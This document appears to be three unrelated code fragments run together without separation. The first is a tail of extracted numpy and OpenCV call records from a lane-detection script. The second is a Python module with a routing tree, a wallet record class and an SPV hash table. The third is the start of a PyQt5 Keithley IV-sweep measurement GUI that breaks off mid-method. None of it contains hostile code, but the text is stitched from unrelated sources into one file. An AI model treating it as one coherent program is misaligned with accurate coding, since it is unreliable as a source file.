np\n'), ((7287, 
7328), 'numpy.int', 'np.int', (['(binary_warped.shape[0] / nwindows)'], {}), '(binary_warped.shape[0] / nwindows)\n', (7293, 7328), True, 'import numpy as np\n'), ((7455, 7475), 'numpy.array', 'np.array', (['nonzero[0]'], {}), '(nonzero[0])\n', (7463, 7475), True, 'import numpy as np\n'), ((7491, 7511), 'numpy.array', 'np.array', (['nonzero[1]'], {}), '(nonzero[1])\n', (7499, 7511), True, 'import numpy as np\n'), ((9563, 9593), 'numpy.concatenate', 'np.concatenate', (['left_lane_inds'], {}), '(left_lane_inds)\n', (9577, 9593), True, 'import numpy as np\n'), ((9616, 9647), 'numpy.concatenate', 'np.concatenate', (['right_lane_inds'], {}), '(right_lane_inds)\n', (9630, 9647), True, 'import numpy as np\n'), ((12861, 12881), 'numpy.array', 'np.array', (['nonzero[0]'], {}), '(nonzero[0])\n', (12869, 12881), True, 'import numpy as np\n'), ((12897, 12917), 'numpy.array', 'np.array', (['nonzero[1]'], {}), '(nonzero[1])\n', (12905, 12917), True, 'import numpy as np\n'), ((15427, 15493), 'numpy.linspace', 'np.linspace', (['(0)', '(binary_warped.shape[0] - 1)', 'binary_warped.shape[0]'], {}), '(0, binary_warped.shape[0] - 1, binary_warped.shape[0])\n', (15438, 15493), True, 'import numpy as np\n'), ((15818, 15840), 'numpy.zeros_like', 'np.zeros_like', (['out_img'], {}), '(out_img)\n', (15831, 15840), True, 'import numpy as np\n'), ((16386, 16435), 'numpy.hstack', 'np.hstack', (['(left_line_window1, left_line_window2)'], {}), '((left_line_window1, left_line_window2))\n', (16395, 16435), True, 'import numpy as np\n'), ((16648, 16699), 'numpy.hstack', 'np.hstack', (['(right_line_window1, right_line_window2)'], {}), '((right_line_window1, right_line_window2))\n', (16657, 16699), True, 'import numpy as np\n'), ((16753, 16765), 'numpy.max', 'np.max', (['fity'], {}), '(fity)\n', (16759, 16765), True, 'import numpy as np\n'), ((17249, 17322), 'numpy.polyfit', 'np.polyfit', (['(left_line.all_y * ym_per_pix)', '(left_line.all_x * xm_per_pix)', '(2)'], {}), '(left_line.all_y * 
ym_per_pix, left_line.all_x * xm_per_pix, 2)\n', (17259, 17322), True, 'import numpy as np\n'), ((17342, 17417), 'numpy.polyfit', 'np.polyfit', (['(right_line.all_y * ym_per_pix)', '(right_line.all_x * xm_per_pix)', '(2)'], {}), '(right_line.all_y * ym_per_pix, right_line.all_x * xm_per_pix, 2)\n', (17352, 17417), True, 'import numpy as np\n'), ((18746, 18814), 'cv2.putText', 'cv2.putText', (['img', 'center_text', '(10, 50)', 'font', '(1)', '(255, 255, 255)', '(2)'], {}), '(img, center_text, (10, 50), font, 1, (255, 255, 255), 2)\n', (18757, 18814), False, 'import cv2\n'), ((18819, 18885), 'cv2.putText', 'cv2.putText', (['img', 'rad_text', '(10, 100)', 'font', '(1)', '(255, 255, 255)', '(2)'], {}), '(img, rad_text, (10, 100), font, 1, (255, 255, 255), 2)\n', (18830, 18885), False, 'import cv2\n'), ((18994, 19022), 'numpy.linalg.inv', 'np.linalg.inv', (['perspective_M'], {}), '(perspective_M)\n', (19007, 19022), True, 'import numpy as np\n'), ((19146, 19190), 'numpy.dstack', 'np.dstack', (['(warp_zero, warp_zero, warp_zero)'], {}), '((warp_zero, warp_zero, warp_zero))\n', (19155, 19190), True, 'import numpy as np\n'), ((19425, 19457), 'numpy.hstack', 'np.hstack', (['(pts_left, pts_right)'], {}), '((pts_left, pts_right))\n', (19434, 19457), True, 'import numpy as np\n'), ((19670, 19737), 'cv2.warpPerspective', 'cv2.warpPerspective', (['color_warp', 'Minv', '(img.shape[1], img.shape[0])'], {}), '(color_warp, Minv, (img.shape[1], img.shape[0]))\n', (19689, 19737), False, 'import cv2\n'), ((19801, 19841), 'cv2.addWeighted', 'cv2.addWeighted', (['img', '(1)', 'newwarp', '(0.3)', '(0)'], {}), '(img, 1, newwarp, 0.3, 0)\n', (19816, 19841), False, 'import cv2\n'), ((20876, 20886), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (20884, 20886), True, 'import matplotlib.pyplot as plt\n'), ((2207, 2241), 'numpy.array', 'np.array', (['[0, 0, 0]'], {'dtype': '"""float"""'}), "([0, 0, 0], dtype='float')\n", (2215, 2241), True, 'import numpy as np\n'), ((2995, 3029), 
'numpy.array', 'np.array', (['[0, 0, 0]'], {'dtype': '"""float"""'}), "([0, 0, 0], dtype='float')\n", (3003, 3029), True, 'import numpy as np\n'), ((6823, 6879), 'numpy.dstack', 'np.dstack', (['(binary_warped, binary_warped, binary_warped)'], {}), '((binary_warped, binary_warped, binary_warped))\n', (6832, 6879), True, 'import numpy as np\n'), ((7134, 7165), 'numpy.argmax', 'np.argmax', (['histogram[midpoint:]'], {}), '(histogram[midpoint:])\n', (7143, 7165), True, 'import numpy as np\n'), ((8438, 8538), 'cv2.rectangle', 'cv2.rectangle', (['out_img', '(win_xleft_low, win_y_low)', '(win_xleft_high, win_y_high)', '(0, 255, 0)', '(2)'], {}), '(out_img, (win_xleft_low, win_y_low), (win_xleft_high,\n win_y_high), (0, 255, 0), 2)\n', (8451, 8538), False, 'import cv2\n'), ((8543, 8645), 'cv2.rectangle', 'cv2.rectangle', (['out_img', '(win_xright_low, win_y_low)', '(win_xright_high, win_y_high)', '(0, 255, 0)', '(2)'], {}), '(out_img, (win_xright_low, win_y_low), (win_xright_high,\n win_y_high), (0, 255, 0), 2)\n', (8556, 8645), False, 'import cv2\n'), ((10109, 10136), 'numpy.polyfit', 'np.polyfit', (['lefty', 'leftx', '(2)'], {}), '(lefty, leftx, 2)\n', (10119, 10136), True, 'import numpy as np\n'), ((10499, 10536), 'numpy.mean', 'np.mean', (['left_line.recent_fit'], {'axis': '(0)'}), '(left_line.recent_fit, axis=0)\n', (10506, 10536), True, 'import numpy as np\n'), ((10924, 10953), 'numpy.polyfit', 'np.polyfit', (['righty', 'rightx', '(2)'], {}), '(righty, rightx, 2)\n', (10934, 10953), True, 'import numpy as np\n'), ((11330, 11368), 'numpy.mean', 'np.mean', (['right_line.recent_fit'], {'axis': '(0)'}), '(right_line.recent_fit, axis=0)\n', (11337, 11368), True, 'import numpy as np\n'), ((13813, 13840), 'numpy.polyfit', 'np.polyfit', (['lefty', 'leftx', '(2)'], {}), '(lefty, leftx, 2)\n', (13823, 13840), True, 'import numpy as np\n'), ((14203, 14240), 'numpy.mean', 'np.mean', (['left_line.recent_fit'], {'axis': '(0)'}), '(left_line.recent_fit, axis=0)\n', (14210, 14240), 
True, 'import numpy as np\n'), ((14618, 14647), 'numpy.polyfit', 'np.polyfit', (['righty', 'rightx', '(2)'], {}), '(righty, rightx, 2)\n', (14628, 14647), True, 'import numpy as np\n'), ((15024, 15062), 'numpy.mean', 'np.mean', (['right_line.recent_fit'], {'axis': '(0)'}), '(right_line.recent_fit, axis=0)\n', (15031, 15062), True, 'import numpy as np\n'), ((15738, 15794), 'numpy.dstack', 'np.dstack', (['(binary_warped, binary_warped, binary_warped)'], {}), '((binary_warped, binary_warped, binary_warped))\n', (15747, 15794), True, 'import numpy as np\n'), ((16849, 16877), 'numpy.absolute', 'np.absolute', (['(2 * left_fit[0])'], {}), '(2 * left_fit[0])\n', (16860, 16877), True, 'import numpy as np\n'), ((16964, 16993), 'numpy.absolute', 'np.absolute', (['(2 * right_fit[0])'], {}), '(2 * right_fit[0])\n', (16975, 16993), True, 'import numpy as np\n'), ((17564, 17595), 'numpy.absolute', 'np.absolute', (['(2 * left_fit_cr[0])'], {}), '(2 * left_fit_cr[0])\n', (17575, 17595), True, 'import numpy as np\n'), ((17710, 17742), 'numpy.absolute', 'np.absolute', (['(2 * right_fit_cr[0])'], {}), '(2 * right_fit_cr[0])\n', (17721, 17742), True, 'import numpy as np\n'), ((17772, 17812), 'numpy.mean', 'np.mean', (['[left_curverad, right_curverad]'], {}), '([left_curverad, right_curverad])\n', (17779, 17812), True, 'import numpy as np\n'), ((19536, 19550), 'numpy.int_', 'np.int_', (['[pts]'], {}), '([pts])\n', (19543, 19550), True, 'import numpy as np\n'), ((20679, 20715), 'os.path.join', 'os.path.join', (['test_img_dir', 'test_img'], {}), '(test_img_dir, test_img)\n', (20691, 20715), False, 'import os\n'), ((20827, 20870), 'cv2.cvtColor', 'cv2.cvtColor', (['blend'], {'code': 'cv2.COLOR_BGR2RGB'}), '(blend, code=cv2.COLOR_BGR2RGB)\n', (20839, 20870), False, 'import cv2\n'), ((1376, 1440), 'cv2.drawChessboardCorners', 'cv2.drawChessboardCorners', (['image', '(9, 6)', 'corners', 'pattern_found'], {}), '(image, (9, 6), corners, pattern_found)\n', (1401, 1440), False, 'import cv2\n'), 
((1453, 1475), 'cv2.imshow', 'cv2.imshow', (['"""img"""', 'img'], {}), "('img', img)\n", (1463, 1475), False, 'import cv2\n'), ((1488, 1504), 'cv2.waitKey', 'cv2.waitKey', (['(500)'], {}), '(500)\n', (1499, 1504), False, 'import cv2\n'), ((2100, 2117), 'numpy.array', 'np.array', (['[False]'], {}), '([False])\n', (2108, 2117), True, 'import numpy as np\n'), ((2888, 2905), 'numpy.array', 'np.array', (['[False]'], {}), '([False])\n', (2896, 2905), True, 'import numpy as np\n'), ((3719, 3755), 'cv2.cvtColor', 'cv2.cvtColor', (['dst', 'cv2.COLOR_RGB2HLS'], {}), '(dst, cv2.COLOR_RGB2HLS)\n', (3731, 3755), False, 'import cv2\n'), ((4087, 4105), 'numpy.max', 'np.max', (['abs_sobelx'], {}), '(abs_sobelx)\n', (4093, 4105), True, 'import numpy as np\n'), ((19083, 19111), 'numpy.zeros_like', 'np.zeros_like', (['binary_warped'], {}), '(binary_warped)\n', (19096, 19111), True, 'import numpy as np\n'), ((9352, 9385), 'numpy.mean', 'np.mean', (['nonzerox[good_left_inds]'], {}), '(nonzerox[good_left_inds])\n', (9359, 9385), True, 'import numpy as np\n'), ((9465, 9499), 'numpy.mean', 'np.mean', (['nonzerox[good_right_inds]'], {}), '(nonzerox[good_right_inds])\n', (9472, 9499), True, 'import numpy as np\n'), ((16226, 16263), 'numpy.vstack', 'np.vstack', (['[fit_leftx - margin, fity]'], {}), '([fit_leftx - margin, fity])\n', (16235, 16263), True, 'import numpy as np\n'), ((16484, 16522), 'numpy.vstack', 'np.vstack', (['[fit_rightx - margin, fity]'], {}), '([fit_rightx - margin, fity])\n', (16493, 16522), True, 'import numpy as np\n'), ((19300, 19328), 'numpy.vstack', 'np.vstack', (['[fit_leftx, fity]'], {}), '([fit_leftx, fity])\n', (19309, 19328), True, 'import numpy as np\n'), ((16324, 16361), 'numpy.vstack', 'np.vstack', (['[fit_leftx + margin, fity]'], {}), '([fit_leftx + margin, fity])\n', (16333, 16361), True, 'import numpy as np\n'), ((16584, 16622), 'numpy.vstack', 'np.vstack', (['[fit_rightx + margin, fity]'], {}), '([fit_rightx + margin, fity])\n', (16593, 16622), True, 
'import numpy as np\n'), ((19381, 19410), 'numpy.vstack', 'np.vstack', (['[fit_rightx, fity]'], {}), '([fit_rightx, fity])\n', (19390, 19410), True, 'import numpy as np\n')] |
"""Author: Trinity Core Team
MIT License
Copyright (c) 2018 Trinity
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE."""
import json
import copy
from treelib import Node, Tree
from treelib.exceptions import DuplicatedNodeIdError
import re
def parse_uri(uri):
    """Split a node URI of the fixed form ``publicKey@IP:PORT``.

    Returns:
        ``[public_key, ip, port]`` for a string input, ``None`` otherwise.
    """
    if not isinstance(uri, str):
        return None
    return re.split('[@:]', uri)
class RouteTree(Tree):
    """Routing tree built on treelib.Tree.

    Each Node(tag, nid, data) uses:
      tag: readable node name for humans
      nid: unique id within the tree (the node's URL/IP here)
    """
    def __init__(self):
        super().__init__()
        # record the route path (list of nids from root to target,
        # filled in by find_router)
        self.route_path = []

    def create(self,tag, identifier, data):
        # Create the root node and remember its id as the tree root.
        self.create_node(tag=tag, identifier=identifier, data=data)
        self.root = identifier

    def find_router(self, identifier, policy=None):
        """
        :param identifier: use the url as the identifier
        :param policy: not used currently
        :return: list of node ids from the root down to `identifier`
        """
        # rsearch walks leaf -> root, so reverse to get root -> leaf order.
        self.route_path = [nid for nid in self.rsearch(identifier)][::-1]
        return self.route_path

    @property
    def next_jump(self):
        # The node right after the root on the last computed route,
        # or None when no route was found / root is not on the path.
        try:
            return self.route_path[self.route_path.index(self.root)+1]
        except Exception:
            return None

    @classmethod
    def to_tree(cls, tr_json):
        """Rebuild a RouteTree from its JSON representation."""
        tree = cls()
        # NOTE(review): `item` is unused -- the full tr_json is re-expanded
        # once per top-level element (duplicates are swallowed by the
        # DuplicatedNodeIdError handler below). Looks like it was meant to
        # be tree.expand_branch(json.dumps(item)); confirm against callers.
        for item in json.loads(tr_json):
            tree.expand_branch(tr_json = tr_json)
        return tree

    def expand_branch(self, tr_json, father= None):
        """Recursively add one JSON branch (and its children) under `father`."""
        tr = json.loads(tr_json)
        # Single-key dict: {tag: {"data": {...}, "children": [...]}}
        tag = list(tr.keys())[0]
        nid = tr[tag]["data"]["Ip"]
        try:
            self.create_node(tag=tag, identifier=nid, parent=father, data=tr[tag]["data"])
        except DuplicatedNodeIdError:
            # Node already present; keep the existing one.
            pass
        # print(tr.values())
        child = list(tr.values())[0].get("children")
        # print(child)
        if child:
            for item in child:
                # Children arrive as dicts; re-serialize for the recursive call.
                self.expand_branch(json.dumps(item), father=nid)
        else:
            pass

    def sync_tree(self, peer_tree):
        """
        get all peers node id\n
        traversal all peers \n
        deep copy current tree get the new_tree\n
        make child as the new_tree root\n
        :param peer_tree: RouteTree received from a peer; not mutated
                          (a deep copy is grafted instead)
        :return:
        """
        copy_peer_tree = copy.deepcopy(peer_tree)
        # if contains each other: drop duplicated nodes so paste() below
        # cannot raise on colliding identifiers.
        for self_nid in self.nodes.keys():
            if copy_peer_tree.contains(self_nid) and self_nid != peer_tree.root:
                copy_peer_tree.remove_node(self_nid)
        if self.contains(peer_tree.root):
            self.remove_node(peer_tree.root)
        # print(peer_tree.to_dict(with_data=True))
        # Graft the peer's (deduplicated) tree under our root.
        self.paste(self.root, copy_peer_tree)
class WalletSet(object):
    """Plain record describing a wallet peer.

    Known fields (all overridable via keyword arguments):
      address, ip, port, public_key, deposit -- default to None
      fee -- defaults to 0
    Any extra keyword arguments become additional instance attributes.
    """
    def __init__(self, **kwargs):
        # Seed the known fields with their defaults, then let the caller's
        # keyword arguments override or extend them.
        defaults = {
            'address': None,
            'ip': None,
            'port': None,
            'public_key': None,
            'deposit': None,
            'fee': 0,
        }
        self.__dict__.update(defaults)
        self.__dict__.update(kwargs)
class SPVHashTable(object):
    """
    Description: singleton dictionary mapping a wallet node's public key to
    the list of SPV public keys attached to that wallet.
    """
    # Shared singleton instance (None until first construction).
    hash_instance = None

    def __init__(self):
        # Fix: only create the storage once. The original re-ran
        # `self.__maps = {}` on every SPVHashTable() call, wiping the
        # singleton's accumulated data.
        if not hasattr(self, '_SPVHashTable__maps'):
            self.__maps = {}

    def __new__(cls, *args, **kwargs):
        if not cls.hash_instance:
            # Fix: do not forward *args/**kwargs -- object.__new__ raises
            # TypeError for extra arguments when __new__ is overridden
            # (Python 3).
            cls.hash_instance = object.__new__(cls)
        return cls.hash_instance

    @property
    def maps(self):
        # Read-only view of the underlying wallet -> [spv, ...] dict.
        return self.__maps

    def find_keys(self, spv_key):
        """
        :param spv_key: The public key string of the spv\n
        :return: list type. [wallet-1-public-key , wallet-2-public-key, ...]
        """
        keys = []
        for key in self.maps:
            if spv_key in self.find(key):
                keys.append(key)
        return keys

    def find(self, key):
        """
        :param key: The public key string of the wallet\n
        :return: list type. [spv-1-public-key , spv-2-public-key, ...]
                 (None when the wallet key is unknown)
        """
        return self.maps.get(key)

    def add(self, key, value):
        """
        :param key: The public key string of the wallet
        :param value: the public key of the spv
        :return:

        Note: duplicates are intentionally allowed, matching the original
        (deduplication was deliberately commented out there).
        """
        if key not in self.maps.keys():
            self.maps.update({key: [value]})
        else:
            self.maps[key].append(value)

    def remove(self, key, value):
        """
        :param key: The public key string of the wallet
        :param value: the public key of the spv
        :return:
        """
        if key in self.maps.keys():
            spv_list = self.maps[key]
            if value in spv_list:
                spv_list.remove(value)

    def sync_table(self, hash_table):
        """Merge another wallet->spv-list table into this one.

        :param hash_table: json string or dict type
        :return:
        """
        if isinstance(hash_table, str):
            # decoder
            hash_table = self.to_dict(hash_table)
        if not hash_table:
            return
        for key in hash_table:
            if key in self.maps:
                # Merge and deduplicate (set() loses ordering -- matches
                # the original behavior).
                self.maps[key].extend(hash_table[key])
                self.maps[key] = list(set(self.maps[key]))
            else:
                self.maps[key] = hash_table[key]

    def to_json(self):
        """Serialize the table to a JSON string."""
        return json.dumps(self.maps)

    @staticmethod
    def to_dict(s):
        """Parse a JSON string into a dict."""
        return json.loads(s)
| [
"re.split",
"json.loads",
"json.dumps",
"copy.deepcopy"
] | [((1359, 1380), 're.split', 're.split', (['"""[@:]"""', 'uri'], {}), "('[@:]', uri)\n", (1367, 1380), False, 'import re\n'), ((2413, 2432), 'json.loads', 'json.loads', (['tr_json'], {}), '(tr_json)\n', (2423, 2432), False, 'import json\n'), ((2577, 2596), 'json.loads', 'json.loads', (['tr_json'], {}), '(tr_json)\n', (2587, 2596), False, 'import json\n'), ((3384, 3408), 'copy.deepcopy', 'copy.deepcopy', (['peer_tree'], {}), '(peer_tree)\n', (3397, 3408), False, 'import copy\n'), ((6519, 6540), 'json.dumps', 'json.dumps', (['self.maps'], {}), '(self.maps)\n', (6529, 6540), False, 'import json\n'), ((6599, 6612), 'json.loads', 'json.loads', (['s'], {}), '(s)\n', (6609, 6612), False, 'import json\n'), ((3026, 3042), 'json.dumps', 'json.dumps', (['item'], {}), '(item)\n', (3036, 3042), False, 'import json\n')] |
# ---------------------------------------------------------------------------------
# QKeithleySweep -> QVisaApplication
# Copyright (C) 2019 <NAME>
# github: https://github.com/mesoic
# email: <EMAIL>
# ---------------------------------------------------------------------------------
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
#!/usr/bin/env python
import os
import sys
import time
import threading
# Import numpy
import numpy as np
# Import QVisaApplication
from PyQtVisa import QVisaApplication
# Import PyQtVisa widgets
from PyQtVisa.widgets import QVisaUnitSelector
from PyQtVisa.widgets import QVisaDynamicPlot
# Import QT backends
from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy
from PyQt5.QtCore import Qt, QStateMachine, QState, QObject
from PyQt5.QtCore import Qt, QStateMachine, QState, QObject
from PyQt5.QtGui import QIcon
# Container class to construct sweep measurement widget
class QKeithleySweep(QVisaApplication.QVisaApplication):
def __init__(self, _config):
# Inherits QVisaApplication -> QWidget
super(QKeithleySweep, self).__init__(_config)
# Generate Main Layout
self.gen_main_layout()
#####################################
# APPLICATION HELPER METHODS
#
# Wrapper method to get keitley write handle
# Returns the pyVisaDevice object
def keithley(self, __widget__):
return self.get_device_by_name( __widget__.currentText() )
# Method to refresh the widget
def refresh(self):
# If add insturments have been initialized
if self.get_devices() is not None:
# Reset the widget and add insturments
self.sweep_inst.refresh( self )
self.step_inst.refresh( self )
# Plot control widgets
self.plot_x_inst.refresh( self )
self.plot_y_inst.refresh( self )
# Update sweep parameters and enable output button
self.meas_button.setEnabled(True)
self.update_meas_params()
else:
# Disable output button
self.meas_button.setEnabled(False)
# Method to set sweep parameters
def set_sweep_params(self, start, stop, npts):
# No hysteresis
if self.sweep_hist.currentText() == "None":
sp = np.linspace(float(start), float(stop), int(npts) )
self._set_app_metadata("__sweep__", sp)
# Prepare reverse sweep
if self.sweep_hist.currentText() == "Reverse-sweep":
# Sweep centered hysteresis
sp = np.linspace(float(start), float(stop), int(npts) )
sp = np.concatenate( (sp, sp[-2::-1]) )
self._set_app_metadata("__sweep__", sp)
# Prepare a zero centered hysteresis
if self.sweep_hist.currentText() == "Zero-centered":
# Create a linspace
sp = np.linspace(float(start), float(stop), int(npts) )
# Extract positive slice
pos = np.where(sp > 0, sp, np.nan)
pos = pos[~np.isnan(pos)]
# Extract negative slice
neg = np.where(sp < 0, sp, np.nan)
neg = neg[~np.isnan(neg)]
# Create the zero centered hysteresis re-insert zeros
# Forward sweep, zero crossing
if (start < 0.) and (stop > 0.) and (start < stop):
sp = np.concatenate( ([0.0], pos, pos[-2::-1], [0.0], neg[::-1], neg[1::], [0.0]) )
# Reverse sweep, zero crossing
elif (start > 0.) and (stop < 0.) and (start > stop):
sp = np.concatenate( ([0.0], neg, neg[-2::-1], [0.0], pos[::-1], pos[1::], [0.0]) )
print(sp)
# If not zero crossing, default to "Reverse-sweep" case
else:
sp = np.concatenate( (sp, sp[-2::-1]) )
# Set meta field
self._set_app_metadata( "__sweep__", sp)
# Method to set step parameters
def set_step_params(self, start, stop, npts):
# No hysteresis
sp = np.linspace(float(start), float(stop), int(npts) )
self._set_app_metadata("__step__", sp)
#####################################
# MAIN LAYOUT
#
def gen_main_layout(self):
# Create Icon for QMessageBox
self._set_icon( QIcon(os.path.join(os.path.dirname(os.path.realpath(__file__)), "python.ico")))
# Create layout objects and set layout
self.layout = QHBoxLayout()
self.layout.addWidget(self.gen_main_ctrl(), 1)
self.layout.addWidget(self.gen_main_plot(), 3)
self.setLayout(self.layout)
#####################################
# MAIN LAYOUT
#
# Main controls:
# a) Measure button and state machine
# b) V-Step mode on/off state machine
# c) IV-sweep and V-step configure pages
# d) Save button
	def gen_main_ctrl(self):
		"""Build the left-hand control column and return it as a QWidget.

		Contains the measure/abort button backed by a two-state QStateMachine,
		the parameter-page selector, the stacked sweep/step/plot pages, the
		trace-description meta widget and the save widget.

		:return: the assembled control QWidget.
		"""
		# Main control widget
		self.meas_ctrl = QWidget()
		self.meas_ctrl_layout = QVBoxLayout()
		#####################################
		#  MEASURE STATE MACHINE AND BUTTON
		#
		# Measurement Button. This will be a state machine which
		# alternates between 'measure' and 'abort' states
		self.meas_state = QStateMachine()
		self.meas_button = QPushButton()
		self.meas_button.setStyleSheet(
			"background-color: #dddddd; border-style: solid; border-width: 1px; border-color: #aaaaaa; padding: 7px;" )
		# Create measurement states
		self.meas_run = QState()
		self.meas_stop = QState()
		# Assign state properties and transitions: clicking the button toggles
		# between run and stop; entering a state fires its exec_* handler.
		self.meas_run.assignProperty(self.meas_button, 'text', 'Abort Sweep')
		self.meas_run.addTransition(self.meas_button.clicked, self.meas_stop)
		self.meas_run.entered.connect(self.exec_meas_run)
		self.meas_stop.assignProperty(self.meas_button, 'text', 'Measure Sweep')
		self.meas_stop.addTransition(self.meas_button.clicked, self.meas_run)
		self.meas_stop.entered.connect(self.exec_meas_stop)
		# Add states, set initial state, and start the state machine
		self.meas_state.addState(self.meas_run)
		self.meas_state.addState(self.meas_stop)
		self.meas_state.setInitialState(self.meas_stop)
		self.meas_state.start()
		# Stacked pages: 0 = IV-sweep, 1 = IV-step, 2 = IV-plot (selected by update_config_page)
		self.meas_pages = QStackedWidget()
		self.meas_pages.addWidget(self.gen_sweep_ctrl())
		self.meas_pages.addWidget(self.gen_step_ctrl())
		self.meas_pages.addWidget(self.gen_plot_ctrl())
		# Meta widget for trace description
		self.meta_widget_label = QLabel("<b>Trace Description</b>")
		self.meta_widget = self._gen_meta_widget()
		self.meta_widget.set_meta_subkey("__desc__")
		# Save widget
		self.save_widget = self._gen_save_widget()
		# Pack widgets into layout (top to bottom)
		self.meas_ctrl_layout.addWidget(self.meas_button)
		self.meas_ctrl_layout.addWidget(self.gen_config_ctrl())
		self.meas_ctrl_layout.addWidget(self.meas_pages)
		# Add save widget
		self.meas_ctrl_layout.addStretch(1)
		self.meas_ctrl_layout.addWidget(self.meta_widget_label)
		self.meas_ctrl_layout.addWidget(self.meta_widget)
		self.meas_ctrl_layout.addWidget(self.save_widget)
		# Set layout and return widget reference
		self.meas_ctrl.setLayout(self.meas_ctrl_layout)
		return self.meas_ctrl
#####################################
# CONFIGURE WIDGET
#
	def gen_config_ctrl(self):
		"""Build the parameter-page selector (IV-sweep / IV-step / IV-plot).

		:return: QWidget containing the combo box that drives update_config_page.
		"""
		self.meas_config = QWidget()
		self.meas_config_layout = QVBoxLayout()
		# Page selector; the item order must match the meas_pages stack indices
		self.meas_config_page_label = QLabel("<b>Configure Parameters</b>")
		self.meas_config_page = QComboBox()
		self.meas_config_page.setFixedWidth(200)
		self.meas_config_page.addItems(["IV-sweep", "IV-step", "IV-plot"])
		self.meas_config_page.currentTextChanged.connect(self.update_config_page)
		# Add some space for layout clarity
		self.meas_config_layout.setContentsMargins(0,10,0,10)
		self.meas_config_layout.addWidget(self._gen_vbox_widget([self.meas_config_page_label, self.meas_config_page]))
		# Pack config layout and return reference
		self.meas_config.setLayout(self.meas_config_layout)
		return self.meas_config
# Sweep control layout
	def gen_sweep_ctrl(self):
		"""Build the IV-sweep parameter page: device selector, sweep type,
		hysteresis mode, and the stacked voltage/current sweep sub-pages.

		:return: the assembled QWidget.
		"""
		self.sweep_ctrl = QWidget()
		self.sweep_ctrl_layout = QVBoxLayout()
		# Main control label
		self.sweep_ctrl_label = QLabel("<b>IV-sweep Parameters</b>")
		#####################################
		#  SWEEP INST SELECT
		#
		# Instrument selector
		self.sweep_inst_label = QLabel("Select Device")
		self.sweep_inst = self._gen_device_select()
		self.sweep_inst.setFixedWidth(200)
		#####################################
		#  SWEEP MEASUREMENT CONFIGURATION
		#
		# Current/Voltage Sweep Mode
		self.sweep_src_label = QLabel("Sweep Type")
		self.sweep_src = QComboBox()
		self.sweep_src.setFixedWidth(200)
		self.sweep_src.addItems(["Voltage", "Current"])
		self.sweep_src.currentTextChanged.connect(self.update_sweep_ctrl)
		# Generate voltage and current source widgets
		self.gen_voltage_sweep()		# self.voltage_sweep
		self.gen_current_sweep()		# self.current_sweep
		# Add to stacked widget (page 0 = voltage, page 1 = current)
		self.sweep_pages = QStackedWidget()
		self.sweep_pages.addWidget(self.voltage_sweep)
		self.sweep_pages.addWidget(self.current_sweep)
		self.sweep_pages.setCurrentIndex(0)
		# Hysteresis mode (consumed by set_sweep_params)
		self.sweep_hist_label = QLabel("Hysteresis Mode")
		self.sweep_hist = QComboBox()
		self.sweep_hist.setFixedWidth(200)
		self.sweep_hist.addItems(["None", "Reverse-sweep", "Zero-centered"])
		#####################################
		#  ADD CONTROLS
		#
		# Sweep configuration controls
		self.sweep_ctrl_layout.addWidget(self.sweep_ctrl_label)
		self.sweep_ctrl_layout.addWidget(self._gen_hbox_widget([self.sweep_inst,self.sweep_inst_label]))
		self.sweep_ctrl_layout.addWidget(self._gen_hbox_widget([self.sweep_src, self.sweep_src_label]))
		self.sweep_ctrl_layout.addWidget(self._gen_hbox_widget([self.sweep_hist, self.sweep_hist_label]))
		self.sweep_ctrl_layout.addWidget(self.sweep_pages)
		# Positioning
		self.sweep_ctrl.setLayout(self.sweep_ctrl_layout)
		return self.sweep_ctrl
# Step control layout
	def gen_step_ctrl(self):
		"""Build the V-step parameter page: device/type selectors, stacked
		voltage/current step sub-pages, and the step-bias ON/OFF state machine.

		:return: the assembled QWidget.
		"""
		self.step_ctrl = QWidget()
		self.step_ctrl_layout = QVBoxLayout()
		# Step control label
		self.step_ctrl_label = QLabel("<b>V-step Parameters</b>")
		# Voltage step instrument selector
		self.step_inst_label = QLabel("Select Device")
		self.step_inst = self._gen_device_select()
		self.step_inst.setFixedWidth(200)
		# Step control mode selector
		self.step_src_label = QLabel("Step Type")
		self.step_src = QComboBox()
		self.step_src.setFixedWidth(200)
		self.step_src.addItems(["Voltage", "Current"])
		self.step_src.currentTextChanged.connect(self.update_step_ctrl)
		# Generate voltage and current source widgets
		self.gen_voltage_step()		# self.voltage_step
		self.gen_current_step()		# self.current_step
		# Add step modes to step_pages widget (page 0 = voltage, page 1 = current)
		self.step_pages = QStackedWidget()
		self.step_pages.addWidget(self.voltage_step)
